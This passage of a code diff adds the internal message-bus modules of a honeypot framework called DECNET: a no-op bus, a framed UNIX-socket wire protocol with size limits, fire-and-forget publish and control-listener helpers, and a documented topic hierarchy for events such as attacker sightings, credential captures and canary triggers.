        # the publish backpressure policy (evict the oldest event) to make
        # room.
        for sub in list(self._subs):
            _enqueue_drop_oldest(sub._queue, _CLOSE_SENTINEL)
        self._subs.clear()
 def _enqueue_drop_oldest(queue: "asyncio.Queue[Any]", event: Event) -> None:
    """Put *event* on *queue*, dropping the oldest item if the queue is full.
    Factored out so both FakeBus and the real UNIX server share the exact
    same backpressure policy.
    """
    while True:
        try:
            queue.put_nowait(event)
            return
        except asyncio.QueueFull:
            try:
                dropped = queue.get_nowait()
                log.warning(
                    "bus.fake: subscriber queue full, dropped %s", getattr(dropped, "topic", "?")
                )
            except asyncio.QueueEmpty:
                return
 # ─── NullBus ─────────────────────────────────────────────────────────────────
 class _NullSubscription(Subscription):
    """Empty subscription: iteration ends at once and closing does nothing."""
    async def __anext__(self) -> Event:
        # There is never an event to deliver.
        raise StopAsyncIteration
    async def _aclose(self) -> None:
        # Nothing was opened, so there is nothing to release.
        return None
 class NullBus(BaseBus):
    """Do-nothing bus handed out when ``DECNET_BUS_ENABLED=false``.
    Every publish is discarded without comment and every subscription is
    empty.  Aimed at dev environments with no bus daemon: the process
    starts cleanly, publishing code needs no feature flags, and nothing
    ever blocks on a subscriber.
    """
    async def connect(self) -> None:
        return None
    async def publish(
        self,
        topic: str,
        payload: dict[str, Any],
        *,
        event_type: str = "",
    ) -> None:
        # Arguments are accepted for interface parity and then ignored.
        return None
    def subscribe(self, pattern: str) -> Subscription:
        return _NullSubscription(pattern)
    async def close(self) -> None:
        return None
--- a/decnet/bus/protocol.py
+++ b/decnet/bus/protocol.py
@@ -0,0 +1,145 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Wire protocol for the DECNET bus UNIX-socket transport.
 Frame layout:
    <VERB> [<args ...>]\\n          # ASCII header, single line, no trailing space
    <4-byte big-endian body length>
    <body>                          # orjson-serialized dict, or empty (length 0)
 Verbs:
 * ``HELLO <client-name>`` — optional greeting, logged by server.  Body empty.
 * ``PUB <topic>``          — publisher → server.  Body = payload dict.
 * ``SUB <pattern>``        — subscriber → server.  Body empty.
 * ``UNSUB <pattern>``      — subscriber → server.  Body empty.
 * ``EVT <topic>``          — server → subscriber.  Body = payload dict (wrapped
                             in an :class:`~decnet.bus.base.Event` envelope).
 * ``BYE``                  — either direction.  Body empty.  Graceful shutdown.
 Parsing rules:
 * The header is a single line terminated by ``\\n`` (LF).  ``\\r`` is tolerated
  but not required.
 * Header tokens are whitespace-separated.  The first token is the verb;
  everything after is verb-specific.  We split on the first space only so
  topics / patterns with quoted content are not supported (they are not
  needed — topic segments forbid whitespace per :mod:`decnet.bus.topics`).
 * Maximum header length is 4096 bytes; maximum body length is 1 MiB.  Beyond
  those, the connection is dropped with a logged error.  This is a honeypot
  framework, not a general-purpose message broker; a malformed frame is
  treated as hostile.
 """
 from __future__ import annotations
 import asyncio
 import struct
 from dataclasses import dataclass
 from typing import Any
 import orjson
 # Frame size limits.  encode() refuses to build, and read_frame() refuses to
 # accept, a header line or body larger than these (ProtocolError).
 MAX_HEADER_BYTES = 4096
 MAX_BODY_BYTES = 1 * 1024 * 1024  # 1 MiB
 # Verb constants (callers should reference these, not bare strings).
 HELLO = "HELLO"
 PUB = "PUB"
 SUB = "SUB"
 UNSUB = "UNSUB"
 EVT = "EVT"
 BYE = "BYE"
 # Membership set checked by encode() and read_frame(); any header verb
 # outside it is rejected with ProtocolError.
 _VALID_VERBS = frozenset({HELLO, PUB, SUB, UNSUB, EVT, BYE})
 class ProtocolError(Exception):
    """A frame was malformed or exceeded a size limit.
    Whoever catches this is expected to close the connection."""
@dataclass(frozen=True)
 class Frame:
    """One parsed wire frame (immutable).
    ``body`` is the raw (unparsed) body bytes — callers decide whether to
    orjson-decode it (the protocol does not know whether a given verb
    expects a dict body or an empty one).
    """
    # Header verb, i.e. the text before the first space on the header line.
    verb: str
    args: str            # everything after the verb on the header line, trimmed
    # Raw body bytes; empty when the frame declared a zero-length body.
    body: bytes
 def encode(verb: str, args: str = "", body: dict[str, Any] | None = None) -> bytes:
    """Serialize a frame.
    *body* is a dict that will be orjson-encoded, or ``None`` for an empty
    body.  The header line is ``<verb> <args>`` with trailing whitespace
    removed, followed by LF, then a 4-byte big-endian body length and the
    body itself.
    Raises:
        ProtocolError: unknown verb; *args* contains CR/LF or non-ASCII
            characters; header or body exceeds its size limit.
    """
    if verb not in _VALID_VERBS:
        raise ProtocolError(f"unknown verb {verb!r}")
    if "\n" in args or "\r" in args:
        raise ProtocolError("args must not contain newline characters")
    body_bytes = b"" if body is None else orjson.dumps(body)
    if len(body_bytes) > MAX_BODY_BYTES:
        raise ProtocolError(
            f"body {len(body_bytes)} bytes exceeds max {MAX_BODY_BYTES}"
        )
    header = f"{verb} {args}".rstrip() + "\n"
    try:
        header_bytes = header.encode("ascii")
    except UnicodeEncodeError as exc:
        # The header is ASCII-only on the wire.  Surface a non-ASCII topic
        # as the module's own error type so callers handling ProtocolError
        # see it, instead of a stray UnicodeEncodeError.
        raise ProtocolError(f"header must be ASCII: {exc}") from exc
    if len(header_bytes) > MAX_HEADER_BYTES:
        raise ProtocolError(
            f"header {len(header_bytes)} bytes exceeds max {MAX_HEADER_BYTES}"
        )
    return header_bytes + struct.pack(">I", len(body_bytes)) + body_bytes
 async def read_frame(reader: asyncio.StreamReader) -> Frame | None:
    """Read one frame from *reader*.
    Returns ``None`` on clean EOF before a new frame starts.
    Raises:
        ProtocolError: on any malformed input — EOF in the middle of a
            frame (header, length prefix or body), an over-long or empty
            header, non-ASCII header bytes, an unknown verb, or a declared
            body length above the limit.  The caller should close the
            connection.
    """
    try:
        header = await reader.readuntil(b"\n")
    except asyncio.IncompleteReadError as exc:
        if not exc.partial:
            return None
        raise ProtocolError("connection closed mid-header") from exc
    except asyncio.LimitOverrunError as exc:
        raise ProtocolError("header exceeded buffer limit") from exc
    if len(header) > MAX_HEADER_BYTES:
        raise ProtocolError(f"header {len(header)} bytes exceeds max")
    try:
        line = header.rstrip(b"\r\n").decode("ascii", errors="strict")
    except UnicodeDecodeError as exc:
        # Peer-controlled bytes: report them through the documented error
        # type so they cannot escape a caller's ``except ProtocolError``.
        raise ProtocolError("header is not valid ASCII") from exc
    if not line:
        raise ProtocolError("empty header line")
    verb, _, args = line.partition(" ")
    if verb not in _VALID_VERBS:
        raise ProtocolError(f"unknown verb {verb!r}")
    try:
        length_bytes = await reader.readexactly(4)
        (body_len,) = struct.unpack(">I", length_bytes)
        if body_len > MAX_BODY_BYTES:
            raise ProtocolError(f"body length {body_len} exceeds max")
        body = await reader.readexactly(body_len) if body_len else b""
    except asyncio.IncompleteReadError as exc:
        # Same treatment as EOF inside the header: a truncated frame.
        raise ProtocolError("connection closed mid-frame") from exc
    return Frame(verb=verb, args=args.strip(), body=body)
 def decode_body(body: bytes) -> dict[str, Any]:
    """Parse a frame body into a dict; an empty body yields ``{}``.
    Raises:
        ProtocolError: the bytes are not valid JSON, or the top-level JSON
            value is not an object.
    """
    if body:
        try:
            parsed = orjson.loads(body)
        except orjson.JSONDecodeError as exc:
            raise ProtocolError(f"body is not valid JSON: {exc}") from exc
        if isinstance(parsed, dict):
            return parsed
        raise ProtocolError(f"body must be a JSON object, got {type(parsed).__name__}")
    return {}
--- a/decnet/bus/publish.py
+++ b/decnet/bus/publish.py
@@ -0,0 +1,212 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Fire-and-forget publish helpers shared across every worker.
 Lifted out of ``decnet/mutator/engine.py`` once a second caller showed up
 (DEBT-031).  Keeping one implementation means the "never break the worker
 loop" guarantee is audited in exactly one place.
 """
 from __future__ import annotations
 import asyncio
 import contextlib
 import os
 import signal
 import time
 from typing import Any, Callable
 from decnet.bus import topics as _topics
 from decnet.bus.base import BaseBus
 from decnet.logging import get_logger
 log = get_logger("bus.publish")
 async def publish_safely(
    bus: BaseBus | None,
    topic: str,
    payload: dict[str, Any],
    event_type: str = "",
 ) -> None:
    """Publish on *bus*, guaranteeing that nothing propagates to the caller.
    Workers call this after the DB row (or equivalent side-effect) has been
    committed: the bus is only the notification layer, not the source of
    truth.  A lost publish costs at most a few seconds of UI latency until
    the next poll tick, whereas an exception here would crash the worker —
    strictly worse.  So a ``None`` bus is a silent no-op, and any exception
    from ``bus.publish`` is logged at WARNING and dropped.
    """
    if bus is not None:
        try:
            await bus.publish(topic, payload, event_type=event_type)
        except Exception as exc:  # noqa: BLE001
            log.warning("bus publish failed topic=%s: %s", topic, exc)
 def make_thread_safe_publisher(
    bus: BaseBus | None,
    loop: asyncio.AbstractEventLoop,
 ) -> Callable[[str, dict[str, Any], str], None]:
    """Build a sync callable that marshals publishes back to *loop*.
    Workers that run their hot paths in a worker thread (scapy sniff loop,
    ``asyncio.to_thread`` probes, blocking socket reads) cannot ``await``
    the bus directly.  The returned function schedules the publish on
    *loop* via ``run_coroutine_threadsafe`` and returns immediately — the
    calling thread is never blocked on the publish.
    A ``None`` bus yields a no-op callable.  The callable also does nothing
    once the bus reports ``_closed`` or *loop* has been closed, and it
    never raises: a scheduling failure is logged at DEBUG.
    """
    if bus is None:
        return lambda _topic, _payload, _event_type="": None  # type: ignore[misc]
    def _publish(topic: str, payload: dict[str, Any], event_type: str = "") -> None:
        # Stream threads may keep draining after the bus owner closed it
        # (shutdown race).  Short-circuit here so we don't marshal a
        # coroutine onto a dead loop just to have publish_safely swallow
        # it.  bus.publish's own WARN-once guard handles the rare case
        # where _closed flips between this check and the coroutine
        # actually running.
        if getattr(bus, "_closed", False) or loop.is_closed():
            return
        coro = publish_safely(bus, topic, payload, event_type=event_type)
        try:
            asyncio.run_coroutine_threadsafe(coro, loop)
        except Exception as exc:  # noqa: BLE001
            # Scheduling failed (e.g. the loop closed after the check
            # above), so the coroutine will never run.  Close it explicitly
            # to avoid a "coroutine ... was never awaited" RuntimeWarning.
            coro.close()
            log.debug("cross-thread bus publish failed topic=%s: %s", topic, exc)
    return _publish
 async def run_health_heartbeat(
    bus: BaseBus | None,
    worker: str,
    *,
    interval: float = 30.0,
    extra: Callable[[], dict[str, Any]] | None = None,
 ) -> None:
    """Emit a ``system.<worker>.health`` event, then sleep *interval*; repeat.
    Shared heartbeat loop for agent/forwarder/updater.  Each tick publishes
    ``{"worker": <name>, "ts": <unix-ts>}`` merged with whatever ``extra()``
    returns.  If ``extra()`` raises, that is logged at DEBUG and the tick
    is published without the extra keys.
    With a ``None`` bus the loop still runs (the publish is a no-op), so
    callers can use the same ``asyncio.create_task``/``.cancel()`` pattern
    regardless of bus state.
    Cancellation-safe: ``CancelledError`` ends the loop and is not
    re-raised, so callers awaiting the task during shutdown see a clean
    exit.
    """
    topic = _topics.system_health(worker)
    try:
        while True:
            beat: dict[str, Any] = {"worker": worker, "ts": time.time()}
            if extra is not None:
                try:
                    beat.update(extra())
                except Exception as exc:  # noqa: BLE001
                    log.debug("heartbeat extra() failed worker=%s: %s", worker, exc)
            await publish_safely(bus, topic, beat, event_type=_topics.SYSTEM_HEALTH)
            await asyncio.sleep(interval)
    except asyncio.CancelledError:
        return
 async def run_control_listener(
    bus: BaseBus | None,
    worker: str,
    shutdown: asyncio.Event,
 ) -> None:
    """Subscribe to ``system.<worker>.control`` and honour stop intents.
    On a well-formed ``{"action": "stop", ...}`` message the function sets
    *shutdown* and returns — the worker's main loop is expected to check
    the event and unwind cleanly, matching the SIGTERM path.
    Malformed messages (non-dict payload, missing or unknown action) are
    logged at DEBUG and skipped; the listener keeps running.  A transport
    exception is logged at WARNING and ends the listener.  A ``None`` bus
    yields a coroutine that simply awaits *shutdown* — callers can
    ``create_task`` this unconditionally regardless of bus state.
    Cancellation-safe.
    """
    if bus is None:
        with contextlib.suppress(asyncio.CancelledError):
            await shutdown.wait()
        return
    topic = _topics.system_control(worker)
    with contextlib.suppress(asyncio.CancelledError):
        try:
            async with bus.subscribe(topic) as sub:
                async for event in sub:
                    payload = event.payload or {}
                    if not isinstance(payload, dict):
                        # Without this guard ``.get`` would raise, and the
                        # outer handler would treat one bad message as a
                        # transport failure and disable bus-driven shutdown.
                        log.debug(
                            "control: ignoring non-dict payload worker=%s type=%s",
                            worker, type(payload).__name__,
                        )
                        continue
                    action = payload.get("action")
                    requested_by = payload.get("requested_by", "<unknown>")
                    if action == _topics.WORKER_CONTROL_STOP:
                        log.info(
                            "control: stop requested worker=%s by=%s",
                            worker, requested_by,
                        )
                        shutdown.set()
                        return
                    log.debug(
                        "control: ignoring unknown action worker=%s action=%r",
                        worker, action,
                    )
        except Exception as exc:  # noqa: BLE001
            log.warning(
                "control listener failed worker=%s: %s — shutdown via bus disabled",
                worker, exc,
            )
 async def run_control_listener_signal(
    bus: BaseBus | None,
    worker: str,
 ) -> None:
    """Like :func:`run_control_listener` but signals the process on stop.
    Preferred for workers whose main loop is a blocking thread
    (container-log tail, PTY read, scapy sniff) — wiring an
    ``asyncio.Event`` through the thread boundary is error-prone, and
    every DECNET worker already has systemd-equivalent SIGTERM cleanup.
    A SIGTERM self-signal routes the stop through that same path
    without inventing a second shutdown mechanism.
    Malformed messages (non-dict payload, missing or unknown action) are
    logged at DEBUG and skipped; the listener keeps running.  A ``None``
    bus returns immediately.
    Cancellation-safe.  Never raises: a failed self-signal is logged
    and the loop simply exits (admin can fall back to ``systemctl``).
    """
    if bus is None:
        return
    topic = _topics.system_control(worker)
    with contextlib.suppress(asyncio.CancelledError):
        try:
            async with bus.subscribe(topic) as sub:
                async for event in sub:
                    payload = event.payload or {}
                    if not isinstance(payload, dict):
                        # Without this guard ``.get`` would raise, and the
                        # outer handler would end the listener over a
                        # single bad message.
                        log.debug(
                            "control: ignoring non-dict payload worker=%s type=%s",
                            worker, type(payload).__name__,
                        )
                        continue
                    action = payload.get("action")
                    requested_by = payload.get("requested_by", "<unknown>")
                    if action == _topics.WORKER_CONTROL_STOP:
                        log.info(
                            "control: stop requested worker=%s by=%s → SIGTERM self",
                            worker, requested_by,
                        )
                        try:
                            os.kill(os.getpid(), signal.SIGTERM)
                        except Exception as exc:  # noqa: BLE001
                            log.warning(
                                "control: self-signal failed worker=%s: %s",
                                worker, exc,
                            )
                        return
                    log.debug(
                        "control: ignoring unknown action worker=%s action=%r",
                        worker, action,
                    )
        except Exception as exc:  # noqa: BLE001
            log.warning(
                "control signal listener failed worker=%s: %s",
                worker, exc,
            )
--- a/decnet/bus/topics.py
+++ b/decnet/bus/topics.py
@@ -0,0 +1,653 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Canonical topic hierarchy for the DECNET ServiceBus.
 Locked early so consumers can subscribe with stable wildcard patterns.
 Adding new topic families is fine; **renaming** existing ones is a breaking
 change for every subscriber and requires a coordinated rollout.
 Token structure (NATS-style, dot-separated):
    topology.{topology_id}.mutation.{state}
    topology.{topology_id}.status
    decky.{decky_id}.state
    decky.{decky_id}.traffic
    decky.{decky_id}.mutation
    decky.{decky_id}.lifecycle
    orchestrator.traffic.{decky_id}
    orchestrator.file.{decky_id}
    orchestrator.email.{decky_id}
    attacker.observed
    attacker.scored
    attacker.session.started
    attacker.session.ended
    attacker.observation.{primitive}
    identity.formed
    identity.observation.linked
    identity.merged
    identity.unmerged
    identity.campaign.assigned
    campaign.formed
    campaign.identity.assigned
    campaign.merged
    campaign.unmerged
    credential.captured
    credential.reuse.detected
    attribution.profile.state_changed
    attribution.profile.multi_actor_suspected
    canary.{token_id}.triggered
    canary.{token_id}.placed
    canary.{token_id}.revoked
    system.log
    system.bus.health
    system.{worker}.health
    system.{worker}.control
    email.received
    ttp.tagged
    ttp.rule.fired.{technique_id}
    ttp.rule.suppressed
    ttp.rule.reloaded.{rule_id}
    ttp.rule.state.{rule_id}
 Wildcards (per :func:`decnet.bus.base.matches`):
 * ``*`` matches exactly one token.
 * ``>`` matches one-or-more trailing tokens (so ``topology.>`` matches
  ``topology.abc.status`` but not the bare root ``topology``).
 """
 from __future__ import annotations
 # ─── Root prefixes ───────────────────────────────────────────────────────────
 # First token of every topic family.  The builder functions further down
 # prepend these to the caller-supplied segments; subscribers can pair a root
 # with the ``>`` wildcard (e.g. ``topology.>``) to receive a whole family.
 TOPOLOGY = "topology"
 DECKY = "decky"
 ATTACKER = "attacker"
 IDENTITY = "identity"
 CAMPAIGN = "campaign"
 SYSTEM = "system"
 CREDENTIAL = "credential"
 ATTRIBUTION = "attribution"
 ORCHESTRATOR = "orchestrator"
 CANARY = "canary"
 SMTP = "smtp"
 EMAIL = "email"
 TTP = "ttp"
 # ─── Leaf event-type constants (the last segment of each topic) ──────────────
 # Topology mutation lifecycle states — keep in sync with TopologyMutation.state
 # in decnet/web/db/models.py; the bus topic mirrors the DB state machine.
 MUTATION_ENQUEUED = "enqueued"
 MUTATION_APPLYING = "applying"
 MUTATION_APPLIED = "applied"
 MUTATION_FAILED = "failed"
 # Topology-level status transitions (topology.{id}.status): fires when the
 # topology row's status column changes (pending/deploying/active/degraded/failed).
 TOPOLOGY_STATUS = "status"
 # Decky-level event types (third token, after the decky id).
 DECKY_STATE = "state"
 DECKY_TRAFFIC = "traffic"
 # On-demand mutation request — published by the API/CLI/UI, consumed by
 # the mutator's watch loop to force an immediate mutation of one decky
 # without waiting for its scheduled interval.  Underscored (not dotted)
 # to stay a single NATS token so the builder's validator accepts it.
 DECKY_MUTATE_REQUEST = "mutate_request"
 # Mutation transition event — distinct from DECKY_STATE ("current
 # shape") because a mutation is a *transition* that carries old/new
 # services + trigger + timing.  Correlator consumes these (via the
 # syslog sidechannel too) to interleave substrate-change markers into
 # attacker traversals.
 DECKY_MUTATION = "mutation"
 # Per-service add/remove on a deployed decky (live; no full redeploy).
 # Payload carries ``decky_name``, ``service_name``, optional
 # ``topology_id``, and ``services`` (the post-mutation list).  Consumers
 # that watch substrate shape (correlator, dashboard, profiler) reconcile
 # off these without waiting for the next decnet-state.json snapshot.
 DECKY_SERVICE_ADDED = "service_added"
 DECKY_SERVICE_REMOVED = "service_removed"
 # Per-service config change (the schema-driven Inspector form).  Payload
 # carries ``decky_name``, ``service_name``, optional ``topology_id``,
 # ``service_config`` (the new validated dict), and ``recreated`` — true
 # when the operator hit Apply (container was force-recreated to pick up
 # the new env), false when they only hit Save (DB-only).
 DECKY_SERVICE_CONFIG_CHANGED = "service_config_changed"
 # Async deploy/mutate operation transitions
 # (pending/running/succeeded/failed).  Payload: {lifecycle_id, operation,
 # status, error?}.  UI polling endpoint is the source of truth; this
 # fires for live subscribers (dashboard, mutator-side audit, etc).
 DECKY_LIFECYCLE = "lifecycle"
 # Attacker event types (second token under the ``attacker`` root).  First
 # sighting, session boundary transitions, and score-threshold crossings
 # published by correlator + profiler.  Consumers typically subscribe to
 # the wildcard ``attacker.>``.
 ATTACKER_OBSERVED = "observed"
 ATTACKER_SCORED = "scored"
 # Published once per successful fingerprint result (JARM/HASSH/TCPfp/tls_cert/ipv6_leak);
 # most come from active probes, but ipv6_leak may also come from the passive sniffer.
 # Distinct from ``observed`` which is the correlator's first-sight signal —
 # a fingerprint is additional evidence about an already-observed attacker.
 # Known payload ``kind`` discriminators carried in this topic:
 #   "jarm"         — JARM TLS server hash (prober)
 #   "hassh"        — HASSHServer SSH key-exchange hash (prober)
 #   "tcpfp"        — TCP/IP stack fingerprint hash (prober)
 #   "tls_cert"     — leaf TLS certificate SHA-256 (prober)
 #   "ipv6_leak"    — fe80:: link-local address observed via passive sniffer
 #                    or active ICMPv6 solicitation (prober + sniffer);
 #                    payload: {attacker_ip, addr, iid_kind, mac_oui, vector,
 #                              on_iface, observed_at}
 ATTACKER_FINGERPRINTED = "fingerprinted"
 # Published when the prober observes a NEW hash for an
 # (attacker_ip, port, probe_type) triple it has seen before — i.e. the
 # attacker rotated their VPS, rebuilt their SSH server, swapped their
 # TLS cert.  Distinct from ``fingerprinted`` which fires on every probe
 # result; ``fingerprint_rotated`` fires only on diff and carries both
 # old_hash + new_hash.  Producer: prober (via the rotation library);
 # consumers: dashboard, forensics, attribution clustering.
 ATTACKER_FINGERPRINT_ROTATED = "fingerprint_rotated"
 ATTACKER_SESSION_STARTED = "session.started"
 ATTACKER_SESSION_ENDED = "session.ended"
 # Published by the ``decnet enrich`` worker after an enrichment pass
 # succeeds for an attacker IP (one or more 3rd-party intel providers
 # returned a verdict).  Payload carries the aggregate verdict + per-
 # provider summary so SIEM-bound webhooks don't need to re-query the DB.
 ATTACKER_INTEL_ENRICHED = "intel.enriched"
 # Per-primitive BEHAVE-SHELL observation. Full topic shape:
 #   attacker.observation.<primitive>
 # e.g. ``attacker.observation.motor.input_modality``.  Producer:
 # ``decnet/profiler/behave_shell/`` (extractor library called from the
 # profiler worker on ``attacker.session.ended``); consumers: dashboard
 # SSE relay, attribution engine state machine, federation gossip
 # (post-v0).  See development/BEHAVE-INTEGRATION.md §"Bus topics" for
 # the wire-format contract — the prefix is documentation + pattern
 # match only; bus auth is socket file perms (DEBT-029 §2), not
 # topic-level.  The ``primitive`` segment MAY contain dots
 # (``motor.shell_mastery.tab_completion``) — the same dotted-leaf
 # rule that ``attacker.session.ended`` uses.
 ATTACKER_OBSERVATION_PREFIX = "observation"
 # Identity-resolution event types (second/third tokens under ``identity``).
 # Published by the (future) clusterer worker — see
 # development/IDENTITY_RESOLUTION.md.  Constants ship in this commit;
 # no publishers exist yet, but consumers (webhook worker, dashboard
 # SSE relay) can subscribe to ``identity.>`` from day one and receive
 # events the instant the clusterer comes online.
 #
 #   identity.formed              — clusterer creates a new identity from
 #                                  one or more observations
 #   identity.observation.linked  — observation attached to an existing
 #                                  identity (or reattached from another)
 #   identity.merged              — two identities collapsed; loser gets
 #                                  ``merged_into_uuid`` set, subscribers
 #                                  re-key cached references to the winner
 #   identity.unmerged            — revocable-merge undo: contradicting
 #                                  evidence cleared ``merged_into_uuid``
 #                                  and re-split observations.  The
 #                                  resurrected side's UUID is the same
 #                                  as the prior loser, so subscribers
 #                                  that cached references to the loser
 #                                  during the merged interval can
 #                                  re-attach without a new lookup.
 #
 # ``identity.campaign.assigned`` is emitted by the campaign clusterer rather
 # than the identity clusterer; its constant is defined separately below.
 IDENTITY_FORMED = "formed"
 IDENTITY_OBSERVATION_LINKED = "observation.linked"
 IDENTITY_MERGED = "merged"
 IDENTITY_UNMERGED = "unmerged"
 # Campaign-clusterer cross-family event — fires under ``identity.>`` so
 # identity-stream subscribers (e.g. the IdentityDetail SSE client) get
 # notified the moment an identity's ``campaign_id`` changes without
 # having to subscribe to the campaign topic family.  The same event
 # fires under ``campaign.identity.assigned`` for campaign-side
 # subscribers.
 IDENTITY_CAMPAIGN_ASSIGNED = "campaign.assigned"
 # Campaign-clusterer event types (second/third tokens under
 # ``campaign``).  Mirror of the identity family at the layer above:
 # campaigns group identities into operations, and the clusterer
 # publishes the same form / link / merge / unmerge lifecycle.
 #
 #   campaign.formed              — clusterer creates a new campaign from
 #                                  one or more identities
 #   campaign.identity.assigned   — identity attached to an existing
 #                                  campaign (or reassigned from another)
 #   campaign.merged              — two campaigns collapsed; loser gets
 #                                  ``merged_into_uuid`` set, subscribers
 #                                  re-key cached references to the winner
 #   campaign.unmerged            — revocable-merge undo: contradicting
 #                                  evidence cleared ``merged_into_uuid``
 #                                  and re-split identities
 CAMPAIGN_FORMED = "formed"
 CAMPAIGN_IDENTITY_ASSIGNED = "identity.assigned"
 CAMPAIGN_MERGED = "merged"
 CAMPAIGN_UNMERGED = "unmerged"
 # Credential event types (second/third tokens under ``credential``).
 # ``credential.captured`` fires once per upserted Credential row — the
 # correlator listens for it and runs the cred-reuse query in response,
 # so reuse detection latency is sub-second after a fresh capture.
 # ``credential.reuse.detected`` fires when the correlator inserts a new
 # CredentialReuse row or grows an existing one (added decky/service/IP).
 CREDENTIAL_CAPTURED = "captured"
 CREDENTIAL_REUSE_DETECTED = "reuse.detected"
 # Attribution-engine event types (second/third tokens under
 # ``attribution``).  Published by the v0 attribution worker
 # (``decnet.correlation.attribution_worker``) which subscribes to
 # ``attacker.observation.>`` and runs the per-(identity, primitive)
 # state machine.  See ``development/ATTRIBUTION-ENGINE.md``.
 #
 #   attribution.profile.state_changed         — per-primitive state
 #                                               transition (e.g.
 #                                               stable → drifting).
 #                                               Payload: identity_uuid,
 #                                               primitive, old_state,
 #                                               new_state, current_value,
 #                                               confidence,
 #                                               observation_count, ts.
 #   attribution.profile.multi_actor_suspected — fires when ≥ 2
 #                                               primitives flag the same
 #                                               identity as multi_actor
 #                                               concurrently. Cross-
 #                                               primitive correlator;
 #                                               single-primitive
 #                                               multi_actor is too noisy
 #                                               on its own. Payload:
 #                                               identity_uuid, primitives,
 #                                               evidence_summary,
 #                                               confidence, ts.
 #
 # These are *derived* signals — distinct from
 # ``identity.*`` (clusterer lifecycle, IDENTITY_RESOLUTION.md) and
 # ``attacker.observation.*`` (raw extractor envelopes,
 # BEHAVE-INTEGRATION.md). The three families compose: observations feed
 # the attribution engine, the engine emits derived state, the clusterer
 # reads observations + state to form / merge identities.
 ATTRIBUTION_PROFILE_PREFIX = "profile"
 ATTRIBUTION_PROFILE_STATE_CHANGED = "profile.state_changed"
 ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED = "profile.multi_actor_suspected"
 # Canary-token event types (third token under ``canary``).
 #
 #   canary.{token_id}.placed     — orchestrator/API successfully planted a
 #                                  canary artifact inside a decky's
 #                                  filesystem (or persisted a passive token
 #                                  that has no callback wiring).  Lets
 #                                  dashboards reflect baseline coverage in
 #                                  real time without a DB poll.
 #   canary.{token_id}.triggered  — ``decnet canary`` worker observed a
 #                                  callback hit (HTTP slug or DNS subdomain
 #                                  lookup) for the token.  Payload carries
 #                                  ``src_ip``, ``user_agent``, ``request_path``
 #                                  and any DNS qname so downstream
 #                                  consumers (correlator, webhook fanout)
 #                                  can attribute and forward without a
 #                                  follow-up DB read.
 #   canary.{token_id}.revoked    — operator removed a token; planter unlinked
 #                                  the file (best-effort) and the row was
 #                                  marked ``revoked``.  Subscribers may
 #                                  evict cached lookups by token id.
 CANARY_PLACED = "placed"
 CANARY_TRIGGERED = "triggered"
 CANARY_REVOKED = "revoked"
 # Orchestrator event types (second token under ``orchestrator``).  The
 # orchestrator worker publishes one of these per synthetic action it
 # drives against a decky — cheap inter-decky traffic and filesystem
 # mutations whose role is to keep the honeypot from looking suspiciously
 # static.  Always nested with the destination decky uuid as the third
 # token, so consumers can subscribe to a single decky's life-injection
 # stream via ``orchestrator.*.<decky_uuid>``.
 ORCHESTRATOR_TRAFFIC = "traffic"
 ORCHESTRATOR_FILE = "file"
 # Emailgen — published by the ``decnet emailgen`` worker once per generated
 # fake email delivered into a mail decky's maildir.  Third token is the
 # destination mail-decky uuid (the IMAP/POP3 host serving the mailbox),
 # matching the ``orchestrator.*.<decky_uuid>`` subscription pattern.
 ORCHESTRATOR_EMAIL = "email"
 # System event types.
 SYSTEM_LOG = "log"
 SYSTEM_BUS_HEALTH = "bus.health"
 # Worker-health leaf — built per-worker as ``system.<worker>.health`` via
 # :func:`system_health`.  The leaf constant stays the same across workers;
 # the worker name goes in the middle token.
 SYSTEM_HEALTH = "health"
 # Worker-control leaf — built per-worker as ``system.<worker>.control`` via
 # :func:`system_control`.  Admin-originated stop intents travel on this
 # topic; each worker subscribes to its own.
 SYSTEM_CONTROL = "control"
 # Control payload ``action`` values — the wire vocabulary.  Only ``stop`` is
 # handled in v1; ``start`` is reserved because a stopped worker has no
 # subscriber, so starting requires external supervision (systemd).
 WORKER_CONTROL_STOP = "stop"
 WORKER_CONTROL_START = "start"
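 # Webhook subscription-set changed — published by the CRUD router after any
 # create / update / delete on WebhookSubscription so the webhook worker can
 # reload its in-memory subscription list and re-subscribe to the new union
 # of patterns. Payload is currently empty; consumers only need the signal.
 # Unlike the leaf constants above, this value is a complete topic (it already
 # starts with the ``system`` root) — publish it as-is rather than passing it
 # through :func:`system`, which would prefix the root a second time.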
 WEBHOOK_SUBSCRIPTIONS_CHANGED = "system.webhook.subscriptions_changed"
 # Email-receipt event — fired by smtp / smtp-relay services on full-message
 # receipt (envelope + headers + body + attachments captured). Single-token
 # leaf so the bus tokenizer accepts it directly under the ``email`` root.
 # Consumed by the TTP ``email_lifter`` for header / body-pattern / attachment
 # rules. PII rule (TTP_TAGGING.md "Hard parts §6"): payload carries hashes,
 # counts, header names, and rcpt-domain sets — never rcpt addresses or body
 # bytes.
 EMAIL_RECEIVED = "received"
 # TTP-tagging event types (second/third tokens under ``ttp``).
 #
 #   ttp.tagged                     — one or more new tags written. Published
 #                                    only when ``INSERT OR IGNORE`` wrote at
 #                                    least one new row; idempotent
 #                                    re-evaluations publish nothing
 #                                    (loop-prevention invariant — see
 #                                    TTP_TAGGING.md).
 #   ttp.rule.fired.{technique_id}  — per-technique fan-out for SIEM
 #                                    consumers that subscribe to a single
 #                                    technique. Topic key is the parent
 #                                    technique; sub_technique is in the
 #                                    payload. Built via :func:`ttp_rule_fired`.
 #   ttp.rule.suppressed            — rule fired but the tag was dropped
 #                                    (confidence below floor, rate-limited,
 #                                    or the rule's RuleState was disabled).
 #                                    Observability signal for the dashboard.
 #
 # Per-rule reload + state-change topics. Built via
 # :func:`ttp_rule_reloaded` / :func:`ttp_rule_state`; SIEM consumers
 # subscribe to ``ttp.rule.reloaded.>`` (every rule) or
 # ``ttp.rule.reloaded.R0001`` (one rule) at their preferred granularity.
 TTP_TAGGED = "tagged"
 TTP_RULE_FIRED = "rule.fired"
 TTP_RULE_SUPPRESSED = "rule.suppressed"
 TTP_RULE_RELOADED = "rule.reloaded"
 TTP_RULE_STATE = "rule.state"
 # ─── Builders ────────────────────────────────────────────────────────────────
 def topology_mutation(topology_id: str, state: str) -> str:
    """Return the mutation-lifecycle topic ``topology.<id>.mutation.<state>``.
    Both arguments are vetted by :func:`_reject_tokens` before the topic
    is assembled, so each must be a single well-formed segment.  Pass
